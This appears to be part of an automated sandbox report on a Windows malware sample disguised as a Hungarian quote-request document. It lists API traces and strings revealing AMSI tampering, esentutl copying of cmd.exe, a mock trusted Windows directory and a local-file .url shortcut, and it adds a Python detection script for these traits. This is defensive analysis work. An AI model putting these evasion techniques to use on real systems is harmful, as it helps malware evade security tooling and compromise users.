29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29b8080 call 29b894c * 6 CloseHandle 8590->9125 9126 29c8ba2-29c8bb4 call 29b8730 8590->9126 8809->8810 9350 29c80f8-29c8104 call 29bb118 8810->9350 8834->8402 8835->8834 8876->8875 9036 29ca0dc-29ca0fe call 29a46d4 * 2 9027->9036 9067 29ca103-29ca10a call 29b89d0 9036->9067 9081 29ca10f-29ca131 call 29a46d4 * 2 9067->9081 9110 29ca136-29ca13d call 29b89d0 9081->9110 9124 29ca142-29ca164 call 29a46d4 * 2 9110->9124 9150 29ca169-29ca170 call 29b89d0 9124->9150 9812 29c92c5-29c939c call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 9125->9812 9126->9125 9166 29ca175-29ca197 call 29a46d4 * 2 9150->9166 9195 29ca19c-29ca1a3 call 29b89d0 9166->9195 9210 29ca1a8-29ca213 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 9195->9210 9286 29ca218-29ca21f call 29b89d0 9210->9286 9298 29ca224-29ca469 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a46d4 * 2 9286->9298 9527 29ca46e-29ca475 call 29b89d0 9298->9527 9361 29c8109-29c8120 call 29a3700 9350->9361 9533 29ca47a-29ca49c call 29a46d4 * 2 9527->9533 9546 29ca4a1-29ca4a8 call 29b89d0 9533->9546 9550 29ca4ad-29ca4cf call 29a46d4 * 2 9546->9550 9563 29ca4d4-29ca4db call 29b89d0 9550->9563 9569 29ca4e0-29ca502 call 29a46d4 * 2 9563->9569 9581 29ca507-29ca50e call 29b89d0 9569->9581 9588 29ca513-29ca9ad call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 
29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 * 5 9581->9588 9889 29ca9b2-29caa07 call 29b89d0 * 6 9588->9889 9812->8219 9901 29caa0c-29caa16 call 29b89d0 9889->9901 9903 29caa1b-29caa43 call 29b89d0 * 3 9901->9903 9909 29caa48-29cadce call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a46d4 * 2 9903->9909 10013 29cadd3-29cadda call 29b89d0 9909->10013 10015 29caddf-29cae01 call 29a46d4 * 2 10013->10015 10019 29cae06-29cae0d call 29b89d0 10015->10019 10021 29cae12-29cae34 call 29a46d4 * 2 10019->10021 10025 29cae39-29cae40 call 29b89d0 10021->10025 10027 29cae45-29cb2f3 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 
2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29a46d4 * 2 call 29b89d0 call 29b7c10 call 29b8338 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 10025->10027 10169 29cb2f8-29cb2fa ExitProcess 10027->10169
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 029B89D0: FreeLibrary.KERNEL32(74B20000,00000000,00000000,00000000,00000000,02A2738C,Function_0000662C,00000004,02A2739C,02A2738C,05F5E103,00000040,02A273A0,74B20000,00000000,00000000), ref: 029B8AAA
                                                                                                                                                    • Part of subcall function 029BDC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,029BDD5E), ref: 029BDCCB
                                                                                                                                                    • Part of subcall function 029BDC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 029BDD05
                                                                                                                                                    • Part of subcall function 029BDC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 029BDD32
                                                                                                                                                    • Part of subcall function 029BDC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 029BDD3B
                                                                                                                                                  • Sleep.KERNEL32(000003E8,ScanBuffer,02A27380,029CB7B8,UacScan,02A27380,029CB7B8,ScanString,02A27380,029CB7B8,029CBB30,00000000,00000000,029CBB24,00000000,00000000), ref: 029C40CB
                                                                                                                                                    • Part of subcall function 029B88B8: LoadLibraryW.KERNEL32(amsi), ref: 029B88C1
                                                                                                                                                    • Part of subcall function 029B88B8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 029B8920
                                                                                                                                                  • Sleep.KERNEL32(000003E8,ScanBuffer,02A27380,029CB7B8,OpenSession,02A27380,029CB7B8,UacScan,02A27380,029CB7B8,000003E8,ScanBuffer,02A27380,029CB7B8,UacScan,02A27380), ref: 029C4277
                                                                                                                                                    • Part of subcall function 029B894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02A273A8,029BA587,ScanString,02A273A8,029BA93C,ScanBuffer,02A273A8,029BA93C,Initialize,02A273A8,029BA93C,UacScan), ref: 029B8960
                                                                                                                                                    • Part of subcall function 029B894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029B897A
                                                                                                                                                    • Part of subcall function 029B894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02A273A8,029BA587,ScanString,02A273A8,029BA93C,ScanBuffer,02A273A8,029BA93C,Initialize), ref: 029B89B6
                                                                                                                                                  • Sleep.KERNEL32(00004E20,UacScan,02A27380,029CB7B8,ScanString,02A27380,029CB7B8,ScanBuffer,02A27380,029CB7B8,OpenSession,02A27380,029CB7B8,UacInitialize,02A27380,029CB7B8), ref: 029C50EE
                                                                                                                                                    • Part of subcall function 029BDC04: RtlI.N(?,?,00000000,029BDC7E), ref: 029BDC2C
                                                                                                                                                    • Part of subcall function 029BDC04: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,029BDC7E), ref: 029BDC42
                                                                                                                                                    • Part of subcall function 029BDC04: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,029BDC7E), ref: 029BDC61
                                                                                                                                                    • Part of subcall function 029A7E5C: GetFileAttributesA.KERNEL32(00000000,?,029C041F,ScanString,02A27380,029CB7B8,OpenSession,02A27380,029CB7B8,ScanString,02A27380,029CB7B8,UacScan,02A27380,029CB7B8,UacInitialize), ref: 029A7E67
                                                                                                                                                    • Part of subcall function 029B85BC: WinExec.KERNEL32(?,?), ref: 029B8624
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Library$FilePath$FreeSleep$LoadNameName_$AddressAttributesCloseCreateDeleteExecProcWrite
                                                                                                                                                  • String ID: /d $ /o$.url$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
                                                                                                                                                  • API String ID: 2171786310-3926298568
                                                                                                                                                  • Opcode ID: e15ecd440916476b5b4f8cd37259a5f7d384eacdc806e9ba8a7b13081d38df3d
                                                                                                                                                  • Instruction ID: efb3c351ed207ab43c1000ceb8f3a07acdcc1cb76ce8853146eeab29cb830b13
                                                                                                                                                  • Opcode Fuzzy Hash: e15ecd440916476b5b4f8cd37259a5f7d384eacdc806e9ba8a7b13081d38df3d
                                                                                                                                                  • Instruction Fuzzy Hash: DE43FE34A0025D8FDB10EB68DCA1ADE73B6FFC5704F2050BA9409AB654DF70AE568F81
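The String ID of this function is the most useful part of the record for a defender: "C:\Windows \SysWOW64\" (trailing space after "Windows", the directory the Sigma hit in the overview refers to), "C:\Windows\System32\esentutl.exe /y " with " /d" and " /o" (esentutl used as a copy primitive), cmd.exe copied to C:\Users\Public\alpha.exe, and an [InternetShortcut] .url body with URL=file:" pointing at a local file. The Win32 layer strips trailing spaces and dots from path components, so "C:\Windows \SysWOW64\per.exe" normalizes to a path under the real Windows directory while the directory itself can only be created through a path that bypasses that normalization (a \\?\ prefix or the native NT path APIs listed above). The following is an added example, not code from the sample or from Joe Sandbox: Python triage logic that applies those three checks to Sysmon-style events. The events are constructed here from the report's strings; the rule names, the PROTECTED_ROOTS and USER_WRITABLE lists, and the update.url / run.cmd file names are assumptions.

```python
"""Host-side triage for the tradecraft visible in the string table: a directory that
normalizes into a trusted path ('C:\\Windows \\SysWOW64\\'), esentutl.exe /y used as a
copy primitive into a user-writable folder, and an InternetShortcut (.url) that points
at a local file. Added example; the events and file names below are constructed."""
import re
from configparser import ConfigParser

# Assumed lists; tune for the estate being monitored.
PROTECTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
USER_WRITABLE = ("c:\\users\\public\\", "c:\\programdata\\", "c:\\users\\")


def normalize_win32(path: str) -> str:
    """Apply the part of Win32 path normalization the trick relies on: trailing spaces
    and dots are stripped from every component, so 'C:\\Windows \\x' becomes 'C:\\Windows\\x'."""
    return "\\".join(part.rstrip(" .") for part in path.replace("/", "\\").split("\\"))


def is_mock_trusted_dir(path: str) -> bool:
    """True when the raw path and its normalized form differ and the normalized form
    lands under a protected root (the 'mock trusted directory' pattern)."""
    norm = normalize_win32(path)
    return norm != path and norm.lower().startswith(PROTECTED_ROOTS)


def in_user_writable(path: str) -> bool:
    return path.lower().startswith(USER_WRITABLE) or is_mock_trusted_dir(path)


# esentutl.exe /y <src> /d <dst> /o : the "/y ", " /d" and " /o" fragments in the string table
ESENTUTL_COPY = re.compile(
    r'esentutl(?:\.exe)?\s+/y\s+"?(?P<src>[^"]+?)"?\s+/d\s+"?(?P<dst>[^"]+?)"?\s+/o\b',
    re.IGNORECASE,
)


def esentutl_copy_destination(cmdline: str):
    """Return the copy destination when esentutl is used to copy a file into a
    user-writable or mock-trusted location, else None."""
    m = ESENTUTL_COPY.search(cmdline)
    if m and in_user_writable(m.group("dst").strip()):
        return m.group("dst").strip()
    return None


def url_shortcut_target(content: str):
    """Parse a .url body ([InternetShortcut] / URL=file:"...") and return the local path."""
    cp = ConfigParser(interpolation=None, strict=False)
    cp.read_string(content)
    if not cp.has_section("InternetShortcut"):
        return None
    url = cp.get("InternetShortcut", "URL", fallback="")
    m = re.match(r'file:(?:///|//)?"?(?P<p>[^"]+)"?', url, re.IGNORECASE)
    return m.group("p").strip() if m else None


def triage(events):
    """Run the three checks over Sysmon-like events; return (rule, evidence) tuples."""
    findings = []
    for ev in events:
        if ev["type"] == "process":
            if is_mock_trusted_dir(ev["image"]):
                findings.append(("mock_trusted_directory", ev["image"]))
            dst = esentutl_copy_destination(ev.get("cmdline", ""))
            if dst:
                findings.append(("esentutl_copy_to_writable", dst))
        elif ev["type"] == "file" and ev["path"].lower().endswith(".url"):
            target = url_shortcut_target(ev["content"])
            if target and in_user_writable(target):
                findings.append(("url_shortcut_to_writable", target))
    return findings


# Constructed events modelled on the report's strings (alpha.exe, per.exe, a .cmd under
# Public\Libraries); update.url and run.cmd are made-up names.
SAMPLE_EVENTS = [
    {"type": "process", "image": "C:\\Windows\\System32\\esentutl.exe",
     "cmdline": "C:\\Windows\\System32\\esentutl.exe /y C:\\Windows\\System32\\cmd.exe "
                "/d C:\\Users\\Public\\alpha.exe /o"},
    {"type": "process", "image": "C:\\Windows \\SysWOW64\\per.exe",
     "cmdline": "\"C:\\Windows \\SysWOW64\\per.exe\""},
    {"type": "file", "path": "C:\\Users\\Public\\update.url",
     "content": "[InternetShortcut]\nURL=file:\"C:\\Users\\Public\\Libraries\\run.cmd\"\n"
                "IconIndex=0\nHotKey=0\n"},
    {"type": "process", "image": "C:\\Windows\\System32\\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for rule, evidence in triage(SAMPLE_EVENTS):
        print(f"{rule}: {evidence}")
```

The mock-directory check deliberately compares the raw path against its normalized form instead of looking for a literal "Windows " string, so it also catches trailing dots and other protected roots; the benign notepad.exe event produces no finding.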

                                                                                                                                                  Control-flow Graph

control_flow_graph: function entered at 29be678, basic blocks 29be678 through 29bef2f. Windows APIs called directly from its blocks: WaitForSingleObject, then CloseHandle twice (block 29bec87). Every other edge targets internal subroutines (29a4860, 29a49a0, 29a46d4, 29a47ec, 29b89d0, 29b894c, 29b8788 and others).
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 029B89D0: FreeLibrary.KERNEL32(74B20000,00000000,00000000,00000000,00000000,02A2738C,Function_0000662C,00000004,02A2739C,02A2738C,05F5E103,00000040,02A273A0,74B20000,00000000,00000000), ref: 029B8AAA
                                                                                                                                                    • Part of subcall function 029B8788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 029B8814
                                                                                                                                                    • Part of subcall function 029B894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02A273A8,029BA587,ScanString,02A273A8,029BA93C,ScanBuffer,02A273A8,029BA93C,Initialize,02A273A8,029BA93C,UacScan), ref: 029B8960
                                                                                                                                                    • Part of subcall function 029B894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029B897A
                                                                                                                                                    • Part of subcall function 029B894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02A273A8,029BA587,ScanString,02A273A8,029BA93C,ScanBuffer,02A273A8,029BA93C,Initialize), ref: 029B89B6
                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,ScanString,02A27380,029BEF4C,OpenSession,02A27380,029BEF4C,UacScan,02A27380,029BEF4C,ScanBuffer,02A27380,029BEF4C,OpenSession,02A27380), ref: 029BED6E
                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,000000FF,ScanString,02A27380,029BEF4C,OpenSession,02A27380,029BEF4C,UacScan,02A27380,029BEF4C,ScanBuffer,02A27380,029BEF4C,OpenSession), ref: 029BED76
                                                                                                                                                  • CloseHandle.KERNEL32(000005F0,00000000,00000000,000000FF,ScanString,02A27380,029BEF4C,OpenSession,02A27380,029BEF4C,UacScan,02A27380,029BEF4C,ScanBuffer,02A27380,029BEF4C), ref: 029BED7F
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Library$CloseFreeHandle$AddressCreateLoadObjectProcProcessSingleUserWait
                                                                                                                                                  • String ID: )"C:\Users\Public\Libraries\rqbnwzgR.cmd" $Amsi$AmsiOpenSession$Initialize$NtOpenProcess$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacScan$ntdll
                                                                                                                                                  • API String ID: 3475578485-323478863
                                                                                                                                                  • Opcode ID: aa5855c6a454f743097b30bac1c67fb0ebe489ed26a8120dc8d3f5dff1850ac4
                                                                                                                                                  • Instruction ID: 045c008730c41281bb7a555d51f86c584b043e2021b580c455580e02ffeb556f
                                                                                                                                                  • Opcode Fuzzy Hash: aa5855c6a454f743097b30bac1c67fb0ebe489ed26a8120dc8d3f5dff1850ac4
                                                                                                                                                  • Instruction Fuzzy Hash: 73222D34A0025C9FEB11EB64D991BCEB3BAFFC9700F6050B5A044AB254DB74AE52CF95

                                                                                                                                                  Control-flow Graph

control_flow_graph: function entered at 29bafe0, basic blocks 29bafe0 through 29bb0ea. Windows APIs called directly: IsBadReadPtr at four sites (blocks 29baff1, 29bb0a8, 29bb0b4, 29bb0c8) and GetModuleHandleW (block 29bb00d); internal subroutines 29b8274 and 29b84c8 are called in between.
                                                                                                                                                  APIs
                                                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 029BB000
                                                                                                                                                  • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 029BB017
                                                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 029BB0AB
                                                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000002), ref: 029BB0B7
                                                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 029BB0CB
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Read$HandleModule
                                                                                                                                                  • String ID: KernelBase$LoadLibraryExA
                                                                                                                                                  • API String ID: 2226866862-113032527
                                                                                                                                                  • Opcode ID: 4f4b5dde6ef4963ced2b8528143b43f096d5504fed1925c55e92ee2863e9d46c
                                                                                                                                                  • Instruction ID: be1bcd55af48dfedc696cfc1f441602bd319254fb128aff14a767094b281142f
                                                                                                                                                  • Opcode Fuzzy Hash: 4f4b5dde6ef4963ced2b8528143b43f096d5504fed1925c55e92ee2863e9d46c
                                                                                                                                                  • Instruction Fuzzy Hash: B2318171A00305BBEF21DB68CD95FAAB7ACBF45358F044510EE24AB2C4D731E900CBA0

Control-flow Graph: function at 029A1724; graph nodes span 029A1684-029A1A8B and call VirtualAlloc, Sleep and the subroutines 029A1500, 029A15CC and 029A1644 (rendered graph and executed/not-executed colouring omitted).
                                                                                                                                                  APIs
                                                                                                                                                  • Sleep.KERNEL32(00000000,?,029A2000), ref: 029A17D0
                                                                                                                                                  • Sleep.KERNEL32(0000000A,00000000,?,029A2000), ref: 029A17E6
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
• Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Sleep
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                                  • Opcode ID: 189fe8bbada0a84cf60418f23197a6ea6db6f6b26bd1ddd5b079f8b67c56482d
                                                                                                                                                  • Instruction ID: 0864f1cbb9bf0358617b65b9b36c40ef5e8d398e31b655786f01341c78c06142
                                                                                                                                                  • Opcode Fuzzy Hash: 189fe8bbada0a84cf60418f23197a6ea6db6f6b26bd1ddd5b079f8b67c56482d
                                                                                                                                                  • Instruction Fuzzy Hash: F9B12376A003518BCB25CF2CE490365BBE1FB8A351F1A86AED45D8B385DB70D456CBD0

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryW.KERNEL32(amsi), ref: 029B88C1
                                                                                                                                                    • Part of subcall function 029B8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029B82FC,?,?,00000000,00000000,?,029B8215,00000000,KernelBASE,00000000,00000000,029B823C), ref: 029B82C1
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029B82C7
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(?,?), ref: 029B82D9
                                                                                                                                                    • Part of subcall function 029B7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 029B7DEC
                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 029B8920
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
• Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                                                                                                  • String ID: DllGetClassObject$W$amsi
                                                                                                                                                  • API String ID: 941070894-2671292670
                                                                                                                                                  • Opcode ID: 16e1840818db9a5f83bfd7945d03aab1a129896fe29def39522248c9fc407ecd
                                                                                                                                                  • Instruction ID: d66f84d417a654caf325d497211a3d8104bce4e1526db62565984581c4af5111
                                                                                                                                                  • Opcode Fuzzy Hash: 16e1840818db9a5f83bfd7945d03aab1a129896fe29def39522248c9fc407ecd
                                                                                                                                                  • Instruction Fuzzy Hash: 14F0A45154C381B9D702E6B8CC45F8BBECD5FE6264F048B18B1E89A2D2D675D10487A7

Control-flow Graph: function at 029A1A8C; graph nodes span 029A16E8-029A1C6B and call VirtualFree, Sleep and the subroutines 029A14C0, 029A1500, 029A1560 and 029A1644 (rendered graph and executed/not-executed colouring omitted).
                                                                                                                                                  APIs
                                                                                                                                                  • Sleep.KERNEL32(00000000,?), ref: 029A1B17
                                                                                                                                                  • Sleep.KERNEL32(0000000A,00000000,?), ref: 029A1B31
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
• Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Sleep
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                                  • Opcode ID: e6bfd17507eb38dbe091d6b4339faf05302206a60a1145b01efe3e9c5a911bb5
                                                                                                                                                  • Instruction ID: 92b7c54618394b240e47deef2d63f17d9f6e13caadc6406d9c7b81b32d9e3e8e
                                                                                                                                                  • Opcode Fuzzy Hash: e6bfd17507eb38dbe091d6b4339faf05302206a60a1145b01efe3e9c5a911bb5
                                                                                                                                                  • Instruction Fuzzy Hash: DA51E2716013408FD725CF6CC9A4766BBE4AF8A314F1985AED84CCB296EB70C445CBD1

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 029BE5F6
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
• Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
